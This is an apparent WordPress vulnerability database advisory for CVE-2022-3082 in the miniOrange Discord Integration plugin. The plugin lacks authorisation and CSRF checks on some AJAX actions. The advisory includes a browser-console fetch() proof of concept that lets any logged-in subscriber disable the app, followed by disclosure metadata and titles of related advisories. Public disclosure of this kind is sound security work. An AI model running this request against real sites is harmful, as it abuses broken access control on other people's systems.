miniOrange Discord Integration < 2.1.6 – Subscriber+ App Disabling | CVE 2022-3082 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF in some of its AJAX actions, allowing any logged in users, such as subscriber to call them, and disable the app for example

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as any user, such as subscriber

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=mo_discord_disable_app&app_name=test',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

miniorange-discord-integration

Fixed in 2.1.6

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

a91d0501-c2a9-4c6c-b5da-b3fc29442a4f

Timeline

Publicly Published

2022-09-26 (about 3 years ago)

Added

2022-09-26 (about 3 years ago)

Last Updated

2023-07-24 (about 2 years ago)

Other

Published

Title

Published

2023-10-11

Title

WordPress Backup & Migration < 1.4.2 - Missing Authorization to Settings and Schedule Modification

Published

2024-12-11

Title

ListApp Mobile Manager <= 1.7.7 - Missing Authorization to Privilege Escalation

Published

2025-08-14

Title

Nexter Blocks < 4.5.5 - Missing Authorization

Published

2024-10-24

Title

Order Notification for Telegram <= 1.0.1 - Missing Authorization to Unauthenticated Send Telegram Test Message

Published

2025-12-22

Title

Tablesome < 1.1.35.2 - Missing Authorization